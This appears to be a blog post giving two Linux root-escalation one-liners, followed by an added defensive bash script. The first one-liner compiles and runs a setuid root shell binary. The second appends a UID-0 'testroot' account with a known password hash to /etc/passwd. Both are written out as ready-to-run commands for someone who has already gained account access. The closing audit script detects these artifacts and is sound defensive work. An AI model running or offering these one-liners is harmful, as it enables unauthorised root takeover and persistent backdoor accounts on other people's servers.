Linux root shell oneliners



Imagine the following scenario: you have gained access to a user account with high privileges (not root) on a Linux server, but you would like to escalate to root. There is no sudo command or other escalation command available. What do you do? Here are two one-liners for escalating to root in Linux.

Compiling a binary, setting the setuid bit and running the file (requires privileges to set the SUID bit, and gcc to be installed and executable):
echo -e '#include <unistd.h>\n int main(int argc, char *argv[]) { setgid(getegid()); setuid(geteuid()); argv[0] = "bash"; execvp(argv[0], argv); }' > test.c; gcc -Wall test.c -o test.o ; chmod +s test.o; ./test.o

Adding a new user with root privileges and switching to this user (requires write access to /etc/passwd):
echo "testroot:aaDuWv0z5WkLo:0:0:root:/root:/bin/bash" >> /etc/passwd ; echo "Password for testroot is testroot - use perl print crypt to change"; su testroot
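Both one-liners leave artifacts that are straightforward to audit for: a setuid/setgid file outside the packaged system paths, and an /etc/passwd entry that has UID 0 or carries a hash in the password field. The following is an added example, not part of the original post; the function names and the sample passwd lines (apart from the testroot entry quoted above) are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added audit example: flags the artifacts left by the two one-liners above.

# audit_passwd [FILE|-]
# Reads a passwd-format file (default: stdin) and prints one finding per line:
#   UID0 <name>  account other than "root" with UID 0
#   HASH <name>  password hash stored in field 2 instead of "x" or a lock marker
#   NOPW <name>  empty password field
audit_passwd() {
  awk -F: '
    /^[ \t]*(#|$)/ { next }                        # skip comments and blank lines
    $3 == 0 && $1 != "root"                { print "UID0 " $1 }
    $2 == ""                               { print "NOPW " $1 }
    $2 != "" && $2 != "x" && $2 !~ /^[*!]/ { print "HASH " $1 }
  ' "${1:--}"
}

# find_suid DIR...
# Lists setuid or setgid regular files under the given directories without
# crossing filesystem boundaries. "chmod +s" sets both bits, so either matches.
find_suid() {
  find "$@" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null || true
}

# Constructed sample input; the last line is the entry from the one-liner above.
sample_passwd() {
  cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
testroot:aaDuWv0z5WkLo:0:0:root:/root:/bin/bash
EOF
}

# When called with directories as arguments, audit the live system.
if [ "$#" -gt 0 ]; then
  echo "== /etc/passwd findings =="
  audit_passwd /etc/passwd
  echo "== setuid/setgid files under: $* =="
  find_suid "$@"
fi
```

Pass the directories to scan as arguments, for example user-writable locations such as /tmp and /home, and compare any setuid hits against the package manager's file list before treating them as findings.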
